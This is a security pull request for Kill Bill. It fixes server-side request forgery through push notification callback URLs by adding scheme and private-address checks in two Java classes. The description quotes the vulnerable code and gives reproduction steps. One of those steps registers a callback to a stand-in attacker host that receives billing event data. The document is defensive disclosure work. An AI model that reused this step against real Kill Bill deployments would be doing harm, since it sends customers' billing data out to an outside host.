### PR TITLE
fix: validate push notification callback URLs to prevent SSRF

### DIFF
--- a/jaxrs/src/main/java/org/killbill/billing/jaxrs/resources/TenantResource.java
+++ b/jaxrs/src/main/java/org/killbill/billing/jaxrs/resources/TenantResource.java
@@ -167,7 +167,44 @@ public class TenantResource extends JaxRsResourceBase {
                                                      @HeaderParam(HDR_COMMENT) final String comment,
                                                      @javax.ws.rs.core.Context final HttpServletRequest request,
                                                      @javax.ws.rs.core.Context final UriInfo uriInfo) throws TenantApiException {
+        validateCallbackUrl(notificationCallback);
         return insertTenantKey(TenantKey.PUSH_NOTIFICATION_CB,  null,  notificationCallback, uriInfo,"getPushNotificationCallbacks", createdBy, reason, comment, request);
+    }
+
+    private void validateCallbackUrl(final String url) {
+        if (url == null || url.isEmpty()) {
+            throw new IllegalArgumentException("Callback URL must not be empty");
+        }
+
+        final java.net.URI uri;
+        try {
+            uri = java.net.URI.create(url);
+        } catch (final IllegalArgumentException e) {
+            throw new IllegalArgumentException("Invalid callback URL: " + url);
+        }
+
+        final String scheme = uri.getScheme();
+        if (scheme == null || (!"https".equalsIgnoreCase(scheme) && !"http".equalsIgnoreCase(scheme))) {
+            throw new IllegalArgumentException("Callback URL must use HTTP or HTTPS scheme");
+        }
+
+        final String host = uri.getHost();
+        if (host == null || host.isEmpty()) {
+            throw new IllegalArgumentException("Callback URL must include a host");
+        }
+
+        // Block requests to private/internal networks
+        final java.net.InetAddress addr;
+        try {
+            addr = java.net.InetAddress.getByName(host);
+        } catch (final java.net.UnknownHostException e) {
+            throw new IllegalArgumentException("Cannot resolve callback host: " + host);
+        }
+
+        if (addr.isLoopbackAddress() || addr.isLinkLocalAddress() ||
+            addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) {
+            throw new IllegalArgumentException("Callback URL must not target internal addresses");
+        }
     }
 
     @TimedResource

--- a/profiles/killbill/src/main/java/org/killbill/billing/server/notifications/PushNotificationListener.java
+++ b/profiles/killbill/src/main/java/org/killbill/billing/server/notifications/PushNotificationListener.java
@@ -129,6 +129,24 @@ public class PushNotificationListener {
     private boolean doPost(final UUID tenantId, final String url, final String body, final NotificationJson notification,
                            final int timeoutSec, final int attemptRetryNumber) {
         log.info("Sending push notification url='{}', body='{}', attemptRetryNumber='{}'", url, body, attemptRetryNumber);
+
+        // Defense in depth: validate URL even though registration should have caught this
+        final java.net.URI targetUri = URI.create(url);
+        final String host = targetUri.getHost();
+        if (host != null) {
+            try {
+                final java.net.InetAddress addr = java.net.InetAddress.getByName(host);
+                if (addr.isLoopbackAddress() || addr.isLinkLocalAddress() ||
+                    addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) {
+                    log.warn("Blocked push notification to internal address url='{}', tenantId='{}'", url, tenantId);
+                    return false;
+                }
+            } catch (final java.net.UnknownHostException e) {
+                log.warn("Cannot resolve push notification host url='{}', tenantId='{}'", url, tenantId);
+                return false;
+            }
+        }
+
         final HttpRequest request = HttpRequest.newBuilder()
                                                .uri(URI.create(url))
                                                .header("User-Agent", USER_AGENT)


### PR DESCRIPTION
## Security Fix: SSRF via Push Notification Callback URL

### Vulnerable Lines

**Registration (no validation):** [`TenantResource.java#L164-L170`](https://github.com/killbill/killbill/blob/master/jaxrs/src/main/java/org/killbill/billing/jaxrs/resources/TenantResource.java#L164-L170)

```java
public Response registerPushNotificationCallback(
        @QueryParam(QUERY_NOTIFICATION_CALLBACK) final String notificationCallback, ...) {
    // notificationCallback goes straight to storage - no validation
    return insertTenantKey(TenantKey.PUSH_NOTIFICATION_CB, null, notificationCallback, ...);
}
```

**Execution (SSRF):** [`PushNotificationListener.java#L132-L142`](https://github.com/killbill/killbill/blob/master/profiles/killbill/src/main/java/org/killbill/billing/server/notifications/PushNotificationListener.java#L132-L142)

```java
final HttpRequest request = HttpRequest.newBuilder()
                                       .uri(URI.create(url))    // attacker-controlled, no checks
                                       .POST(...)
                                       .build();
response = httpClient.send(request, ...);  // fires from the server's network
```

### What could happen

An attacker with tenant API access registers an internal URL (localhost, cloud metadata, private network) as a push notification callback. Every billing event then triggers an HTTP POST from the Kill Bill server to that internal URL. This gives the attacker access to services that should never be reachable externally, and every callback carries billing event data (account IDs, event types).

### How to verify

1. Start Kill Bill 0.24.16 via `docker compose`
2. Register a callback pointing at an attacker-controlled host: `POST /1.0/kb/tenants/registerNotificationCallback?cb=http://attacker:9998/capture`
3. Create an account or trigger any billing event
4. Observe the Kill Bill server making an HTTP POST to the attacker's host with billing event JSON

Full evidence (curl --trace-ascii + raw TCP socket capture): https://gist.github.com/ituatd/6d20fa97d54c144ff3a776559d2ad3d7

### What this PR does

1. **Validates callback URLs at registration time** in `TenantResource` - checks URL scheme (HTTP/HTTPS only), resolves the host, and blocks loopback, link-local, site-local, and any-local addresses.

2. **Defense-in-depth validation at request time** in `PushNotificationListener.doPost()` - same IP checks before making the HTTP request, in case callbacks were registered before this fix.

### Backward compatibility

Callbacks pointing at public, routable hosts continue to work. Only callbacks targeting internal/private addresses are blocked. Existing registered callbacks pointing at internal addresses will be blocked at request time by the defense-in-depth check.

### Evidence

https://gist.github.com/ituatd/6d20fa97d54c144ff3a776559d2ad3d7